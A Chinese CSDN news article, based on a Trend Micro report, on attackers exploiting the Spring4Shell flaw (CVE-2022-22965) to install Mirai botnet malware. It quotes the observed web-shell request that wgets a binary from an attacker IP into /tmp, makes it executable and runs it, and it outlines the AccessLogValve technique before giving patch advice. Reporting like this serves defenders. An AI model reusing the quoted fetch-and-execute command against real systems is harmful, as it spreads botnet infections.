漏洞升级?黑客可利用 Spring 框架漏洞部署 Mirai 恶意软件
整理 | 苏宓
出品 | CSDN(ID:CSDNnews)
还记得不久之前 Java 圈中惊爆的 Spring 框架漏洞吗?得益很多人使用了 JDK 9 以下的版本、Spring 框架的最新版本,截止目前,并没有真实的应用程序惨遭攻击的事件发生。
但是,据网络安全服务商 Trend Micro 最新发布的报告显示,黑客可利用编号为 CVE-2022-22965(国外网友将其称之为 SpringShell)的漏洞,在设备上部署 Mirai 恶意软件,以此感染易受攻击的物联网设备。Mirai 是一种开源恶意软件,可将路由器和其他网络连接设备变成庞大的僵尸网络。
Trend Micro 的研究人员表示,这一漏洞允许黑客能够在易受攻击的服务器上执行 Mirai 僵尸网络恶意软件,尤其是在新加坡地区。
值得注意的是,基于这一漏洞,黑客可将 Mirai 下载到设备的“/tmp”文件夹,并使用“chmod”更改权限后执行。破解的开发请求和命令如下:
http://{victim IP}:9090/tomcatwar[.]jsp?pwd=j&cmd=cd%20/tmp;%20wget%20http://45[.]95[.]169[.]143/The420smokeplace[.]dns/KKveTTgaAAsecNN
aaaa.x86;chmod%20777%20*;./KKveTTgaAAsecNNaaaa.x86%20mSpring[.]x86cd /tmp; wget http://45[.]95[.]169[.]143/The420smokeplace.dns/KKveTTgaAAsecNNaaaa.x86;chmod 777 *;./KKveTTgaAAsecNNaaaa.x86 mSpring[.]x86http://45[.]95[.]169[.]143/The420smokeplace[.]dns/KKveTTgaAAsecNNaaaa.x86
同时,研究人员还发现,恶意软件文件服务器存储了针对不同 CPU 架构的恶意软件的多个变体。不过,其并没有指明具体设备或受感染设备中使用的 CPU 品牌。
很多的不定性也为该漏洞埋下了很大的安全隐患。
此前,据 Spring 官方证实,大多数易受攻击的设置或版本都与以下有关:
Spring Framework 5.2.20、5.3.18 之前的版本、JDK 9 及以上版本
Apache Tomcat
Spring-webmvc 或 spring-webflux 依赖项
在 Spring 参数绑定中,使用了非基本参数类型,例如 POJO
可部署、导出为 Web 归档文件(WAR)
安全研究人员称,有黑客之所以能够成功地将该漏洞武器化,是因为他们熟悉暴露的类对象,这也为他们提供了多种途径。譬如,黑客可以访问 AccessLogValve 对象,并将 Apache Tomcat 中的类变量 'class.module.classLoader.resources.context.parent.pipeline.firstpath' 武器化。他们可以通过操纵 AccessLogValve 对象的属性(例如其模式、后缀、目录和前缀),将访问日志重定向到 Web 根目录中,从而做到这一点。”
那么,对于开发者而言,又有哪些防御措施?
目前,使用 Spring 框架漏洞部署 Mirai 恶意软件的过程以及细节并没有被公开,开发者当前所能做的就是从根源减少 Spring 框架漏洞带来的危害。
根据 Spring 官方所发布的公告,开发者们可及时进行不同版本的更新或降级,其中:
Apache Tomcat 团队已经发布了 10.0.20、9.0.62 和 8.5.78 版本。
建议开发者、企业升级到 Spring Framework 5.3.18+、5.2.20+ 版本:https://github.com/spring-projects/spring-framework/wiki/Spring-Framework-Versions
最后 Spring 官方指出,降级到 JDK 8 也不失为一种良好的解决方案。
参考:https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html
漏洞升级?黑客可利用 Spring 框架漏洞部署 Mirai 恶意软件相关推荐
- Spring框架漏洞合集
Spring框架漏洞合集 Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977) 访问路径/oauth/authorize,会看到左上角有个绿色叶子的标志,一般都 ...
- 利用Spring框架封装的JavaMail现实同步或异步邮件发送
利用Spring框架封装的JavaMail现实同步或异步邮件发送 作者:张纪豪 J2EE简单地讲是在JDK上扩展了各类应用的标准规范,邮件处理便是其中一个重要的应用.它既然是规范,那么我们就可以通过J ...
- json日期格式化 java_java_Java Web程序中利用Spring框架返回JSON格式的日期,返回Json时格式化日期Date
第一 - phpStudy...
Java Web程序中利用Spring框架返回JSON格式的日期 返回Json时格式化日期Date第一步:创建CustomObjectMapper类 /** * 解决SpringMVC使用@Respo ...
- 利用Spring框架封装的JavaMail实现同步或异步邮件发送
J2EE简单地讲是在JDK上扩展了各类应用的标准规范,邮件处理便是其中一个重要的应用.它既然是规范,那么我们就可以通过JDK遵照邮件协议编写一个邮件处理系统,但事实上已经有很多厂商和开源组织这样做了. ...
- Spring框架漏洞总结
点击上方"小强的进阶之路",选择"星标"公众号 优质文章,及时送达 预计阅读时间: 20分钟 Spring简介 Spring是Java EE编程领域的一个轻量级 ...
- 黑客狂野利用零日漏洞:小米三星也中招,安卓手机最易受此漏洞的攻击?
零日漏洞的另一个启示,这次是在全球使用最广泛的移动操作系统Android中.黑客无处不在,知名网络安全专家,东方联盟创始人郭盛华还发现了Android 0day漏洞的狂野利用,这是臭名昭著的,因为它向 ...
- spring框架漏洞整理(Spring Data漏洞)
Spring Data漏洞,Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons 是 Spring Data 下所有子项目共享的基础框架. ( ...
- java反序列化漏洞POP查找_利用 Java 反序列化漏洞在受限环境下获取反向 Shell
原标题:利用 Java 反序列化漏洞在受限环境下获取反向 Shell 原文链接: https://medium.com/abn-amro-red-team/java-deserialization-f ...
- 紧急提醒!黑客正利用假 ChatGPT 来推送恶意软件
黑客正在利用 ChatGPT 的火爆为 Windows 和 Android 分发恶意软件. 整理 | 禾木木 责编 | 梦依丹 出品 | CSDN(ID:CSDNnews) 自 ChatGP ...
最新文章
- 安卓问题总结一(The connection to adb is down)
- 1.6 字符串的比较
- 解决h264bitstream的一个bug
- altium09怎么查元器件_长文图解:单张表数据量太大问题怎么解决?请记住这六个字...
- 网络分析软件(科来网络分析软件)
- 树莓派GPIO引脚详解
- ros2之tello无人机
- STM32的内存扩展应用实现,小内存的单片机也能干大事(FSMC+SRAM)
- jupyter notebook 内核似乎挂掉了
- rsyslog搭建远程日志服务器
- 开源的价值观与文化的传递
- (转)如何彻底的卸载anaconda(包括配置文件)
- Windows CMD中的findstr命令详解
- Iphone手机被偷了 我是如何自保和尝试找回的
- 繁体批量转换工具:支持繁体字和简体本地化互转
- 羊了个羊微信小游戏开发技术解析
- 健身运动装备有哪些?双十一运动健身装备选购指南
- QC新旧七图汇总连载13——过程决策方法图(PDPC)
- redmine2.0 + mongrel
- if (in) 用法
热门文章
- LeetCode for SQL 176. 第二高的薪水 (ifnull limit order by)
- 头条三面: String.valueOf、toString()、(String)强转,有啥区别?
- 引用dll文件要提交解决方案
- SpringBoot入坑-请求参数传递
- 安装Jaspersoft Studio
- 首先不谈C语言,我们先来谈谈编程工具
- 济南学习 Day 5 T2 am
- docker 实战---使用oracle xe作为开发数据库(六)
- linux locate
- 郁金香VC外挂教程(全) 翻录版 免Key(精品教程)